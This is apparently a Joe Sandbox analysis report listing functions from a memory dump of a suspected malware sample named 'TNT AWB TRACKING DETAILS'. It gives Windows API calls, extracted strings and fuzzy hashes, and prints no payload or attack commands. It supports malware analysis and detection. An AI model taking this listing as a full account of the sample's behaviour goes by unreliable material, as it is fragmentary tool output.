Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ab7e527e0fad0b1caee579d92ebef905635d19e5f13f2e15aeb24404c15f3a0b
Instruction ID: d14c426ad352d3991da6118fb3e4c85ef3e8d87da220dae8dae18016a00255a9
Opcode Fuzzy Hash: ab7e527e0fad0b1caee579d92ebef905635d19e5f13f2e15aeb24404c15f3a0b
Instruction Fuzzy Hash: 9C617C31511A01DFCB359F18D948B3AB7F2FB45312F104529E5828BAB0CBB5ACA1DBA1

Function 00AA21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC

GetSysColor.USER32(0000000F), ref: 00AA21D3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 27359eee37ab4337618f4ef2cba80a2ef953a3fefaa442ae54cb6020a61e908c
Instruction ID: bfc0574b739a0ce7ef6c04487aaeb5748bf8013d2816dcde2ad37bd71ed4cbbc
Opcode Fuzzy Hash: 27359eee37ab4337618f4ef2cba80a2ef953a3fefaa442ae54cb6020a61e908c
Instruction Fuzzy Hash: 35417F31100141DADB255F2CDC88BF93B66EB47321F144266FE659B2E5CB318C66DB21

Function 00B0A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00B2F910), ref: 00B0A90B
GetDriveTypeW.KERNEL32(00000061,00B589A0,00000061), ref: 00B0A9D5
_wcscpy.LIBCMT ref: 00B0A9FF

Strings

all, xrefs: 00B0A911
fixed, xrefs: 00B0A953
network, xrefs: 00B0A969
cdrom, xrefs: 00B0A927
ramdisk, xrefs: 00B0A97F
removable, xrefs: 00B0A93D
unknown, xrefs: 00B0A996

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 8093a2d598c93b383a693cf7ab9440be96ab2758f96adc3de8e1ab60d8c870a4
Instruction ID: ea676a5cdc0232ca144dfb11ddfa728f598060d20c71b0a389afa768bf2556a8
Opcode Fuzzy Hash: 8093a2d598c93b383a693cf7ab9440be96ab2758f96adc3de8e1ab60d8c870a4
Instruction Fuzzy Hash: 3B518C312183019BC310EF14CA92EAFBBE5EF85740F514CADF896572E2DB319909CA53

Function 00AA9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00AA9862
__swprintf.LIBCMT ref: 00AA98AC
__i64tow.LIBCMT ref: 00ADF5E6

Strings

True, xrefs: 00ADF5A7
0x%p, xrefs: 00ADF5C8
%.15g, xrefs: 00AA98A6
False, xrefs: 00ADF5AE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: e2982040713f32a2dd68cfb200a771a23d397b20a91a24a5ef6d66256a68f5d6
Instruction ID: 8505805378bbb9017ad4e11998941e7f1f6dca44d5850b454e2892e3efbd0120
Opcode Fuzzy Hash: e2982040713f32a2dd68cfb200a771a23d397b20a91a24a5ef6d66256a68f5d6
Instruction Fuzzy Hash: 8F41A171500205AEEB259F74E942F7BB3F8EF4A300F2044AEE54BDB291EB3599418B10

Function 00B27152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B2716A
CreateMenu.USER32 ref: 00B27185
SetMenu.USER32(?,00000000), ref: 00B27194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27221
IsMenu.USER32(?), ref: 00B27237
CreatePopupMenu.USER32 ref: 00B27241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B2726E
DrawMenuBar.USER32 ref: 00B27276

Strings

F, xrefs: 00B27262
0, xrefs: 00B27160

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 5577a1faae530789d9dc1bbdb95b881ed88258f05bd9c9b8b22acb83f02518c7
Instruction ID: 2549156dfd014025b7654f907e3cd28c44ceeabdb0d4f3d9d4832d3b50b8f372
Opcode Fuzzy Hash: 5577a1faae530789d9dc1bbdb95b881ed88258f05bd9c9b8b22acb83f02518c7
Instruction Fuzzy Hash: CF416B74A01215EFDB20DF64E984EAA7BF5FF49310F1404A8F949A7360DB31A920CFA4

Function 00B274BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B2755E
CreateCompatibleDC.GDI32(00000000), ref: 00B27565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B27578
SelectObject.GDI32(00000000,00000000), ref: 00B27580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B2758B
DeleteDC.GDI32(00000000), ref: 00B27594
GetWindowLongW.USER32(?,000000EC), ref: 00B2759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B275B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B275BE

Strings

static, xrefs: 00B274F6

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 87593af19407574fbe1c7d21275e6be0ba2be6c34e7cfe15d93cea740d9732f6
Instruction ID: fda1232a0d2b078c7c13acbc4e44be2c7a42693bf7bb18c9f893d2712cc3fef1
Opcode Fuzzy Hash: 87593af19407574fbe1c7d21275e6be0ba2be6c34e7cfe15d93cea740d9732f6
Instruction Fuzzy Hash: AB318431144125BBDF225F64EC09FEB7BB9FF19721F110268FA19961A0CB35D812DB64

Function 00AC6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC6E3E

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

__gmtime64_s.LIBCMT ref: 00AC6ED7
__gmtime64_s.LIBCMT ref: 00AC6F0D
__gmtime64_s.LIBCMT ref: 00AC6F2A
__allrem.LIBCMT ref: 00AC6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC6F9C
__allrem.LIBCMT ref: 00AC6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC6FD1
__allrem.LIBCMT ref: 00AC6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC7006
__invoke_watson.LIBCMT ref: 00AC7077

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: a7eb6716da1e1654193514a3270c4b37a093387c0e1d169bcfeced1e7712d5e5
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: D371E476A00717ABDB14EF69DD41F6AB7B8AF04360F15822EF515D7281EB70DE408B90

Function 00B02527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02542
GetMenuItemInfoW.USER32(00B65890,000000FF,00000000,00000030), ref: 00B025A3
SetMenuItemInfoW.USER32(00B65890,00000004,00000000,00000030), ref: 00B025D9
Sleep.KERNEL32(000001F4), ref: 00B025EB
GetMenuItemCount.USER32(?), ref: 00B0262F
GetMenuItemID.USER32(?,00000000), ref: 00B0264B
GetMenuItemID.USER32(?,-00000001), ref: 00B02675
GetMenuItemID.USER32(?,?), ref: 00B026BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B02700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02735

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 4fd0f13230e49b25d7f9dd7aa91c03bbb9f86f5b92352365cf9e484804685fff
Instruction ID: 2e8127ad976b58990a90bb7c224e4b076936e5692ca69246ce34d2fcd4c723f4
Opcode Fuzzy Hash: 4fd0f13230e49b25d7f9dd7aa91c03bbb9f86f5b92352365cf9e484804685fff
Instruction Fuzzy Hash: 58615C70900249AFDF21CF64DD88DBE7FF8EB45344F1441A9E842A7291DB72AD19DB21

Function 00B26F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B26FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B26FA8
GetWindowLongW.USER32(?,000000F0), ref: 00B26FCC
_memset.LIBCMT ref: 00B26FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B26FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B27067

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 4439f84c776ffadd00df692daac166234a6652d7fd5976e1805b8e0fcc7c01b1
Instruction ID: dbe5ac038eae59f163b3fa00c26045205f7e750e831e478606678f59fefea983
Opcode Fuzzy Hash: 4439f84c776ffadd00df692daac166234a6652d7fd5976e1805b8e0fcc7c01b1
Instruction Fuzzy Hash: 5F619F71900218AFDB21DFA4DC81EEE77F8EF09700F100199FA14AB2A1CB75AD55DB94

Function 00AF6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AF6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00AF6C18
VariantInit.OLEAUT32(?), ref: 00AF6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AF6C4A
VariantCopy.OLEAUT32(?,?), ref: 00AF6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AF6CB1
VariantClear.OLEAUT32(?), ref: 00AF6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00AF6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF6CDC
VariantClear.OLEAUT32(?), ref: 00AF6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF6CF9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: fd11bca3705868f5d15d75d75163cb616568cd17f13d6f92df1fd484d11219f8
Instruction ID: 3915d60959ec381dfc7931aea674af8a56d6b7738effb9581151d0fa78c75a27
Opcode Fuzzy Hash: fd11bca3705868f5d15d75d75163cb616568cd17f13d6f92df1fd484d11219f8
Instruction Fuzzy Hash: 7441217590011D9FCF10EFA8D9449BEBBB9EF08354F008075FA55A7361CB74AA46CBA0

Function 00B15732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B15793
inet_addr.WSOCK32(?,?,?), ref: 00B157D8
gethostbyname.WSOCK32(?), ref: 00B157E4
IcmpCreateFile.IPHLPAPI ref: 00B157F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B15878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B158ED
WSACleanup.WSOCK32 ref: 00B158F3

Strings

Ping, xrefs: 00B15816

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 834d7d03efd2507f1aa5b6f897071536a5783014d1100a5c35b65cedd56b1bad
Instruction ID: 9125b2e1ebbd87eddd6d75c4460a140508530ecdb9a273d5b3c83cd59adb4760
Opcode Fuzzy Hash: 834d7d03efd2507f1aa5b6f897071536a5783014d1100a5c35b65cedd56b1bad
Instruction Fuzzy Hash: 2D517D31604601DFD720AF24CD85BAAB7E4EF89710F4445A9F996EB2E1DB30EC41DB52

Function 00B0B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B0B546
GetLastError.KERNEL32 ref: 00B0B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00B0B5BD

Strings

INVALID, xrefs: 00B0B58F
UNKNOWN, xrefs: 00B0B575
NOTREADY, xrefs: 00B0B57C
READONLY, xrefs: 00B0B588
READY, xrefs: 00B0B596

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: a1285b0d3b51a20cb80ec2f28f45935b5011e2e5d0f7646d9e7026cd061092da
Instruction ID: f9b5d5efccfb61575793e78478f15055d567c398c50e304290644f6601442c6d
Opcode Fuzzy Hash: a1285b0d3b51a20cb80ec2f28f45935b5011e2e5d0f7646d9e7026cd061092da
Instruction Fuzzy Hash: CC318035A002099FCB10DB68CDA5EBE7BF8EF19311F1041E6E905AB2D1DB719A46CB51

Function 00AF8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AF9014
GetDlgCtrlID.USER32 ref: 00AF901F
GetParent.USER32 ref: 00AF903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF903E
GetDlgCtrlID.USER32(?), ref: 00AF9047
GetParent.USER32(?), ref: 00AF9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9066

Strings

ComboBox, xrefs: 00AF8F9C
ListBox, xrefs: 00AF8FD1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 6ee2989dff0aa1fe2f1df7675def9097acf2a80fee00a668d6797e1dc63d03c9
Instruction ID: 8e27a3e2f803d3a35e89291da2b08c6a203540274df30fc6e3c417c915fe7bd1
Opcode Fuzzy Hash: 6ee2989dff0aa1fe2f1df7675def9097acf2a80fee00a668d6797e1dc63d03c9
Instruction Fuzzy Hash: 0B21D074A00109BBDF15ABA0CC85EFEBBB4EF49310F104169BA21972F1DF795819DB20

Function 00AF907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AF90FD
GetDlgCtrlID.USER32 ref: 00AF9108
GetParent.USER32 ref: 00AF9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9127
GetDlgCtrlID.USER32(?), ref: 00AF9130
GetParent.USER32(?), ref: 00AF914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF914F

Strings

ComboBox, xrefs: 00AF9087
ListBox, xrefs: 00AF90BC

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: e0e3bb727a684bb11f2e877ba3a9c0cb7b3798641bb7a8c5732bb88b94381644
Instruction ID: 46a2714bde2ce798da3c987f324ecca640a27e99899bcbe325c3c33121530cbe
Opcode Fuzzy Hash: e0e3bb727a684bb11f2e877ba3a9c0cb7b3798641bb7a8c5732bb88b94381644
Instruction Fuzzy Hash: 2321C274A00109BBDF11ABE5CC89FFEBBB8EF49300F10416ABA11972A1DF755819DB20

Function 00AF9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00AF916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00AF9184
_wcscmp.LIBCMT ref: 00AF9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AF9211

Strings

SHELLDLL_DefView, xrefs: 00AF9190
list, xrefs: 00AF91F3
details, xrefs: 00AF91BF
largeicons, xrefs: 00AF91A5
smallicons, xrefs: 00AF91D9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: db852495ee5ba8432808ef99f18f6c0c3aa1d8a43a9799c534ffbaf759f82099
Instruction ID: 552de2470954a152b3d984de5dae256e6e8419f82ebb7401074d2ae0e4f63ee1
Opcode Fuzzy Hash: db852495ee5ba8432808ef99f18f6c0c3aa1d8a43a9799c534ffbaf759f82099
Instruction Fuzzy Hash: E311CA3A28830BBAFA212664EC0AFF73BECDB15721F200166FE00A54F1FE6158555694

Function 00B188AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B188D7
CoInitialize.OLE32(00000000), ref: 00B18904
CoUninitialize.OLE32 ref: 00B1890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00B18A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B18B3B
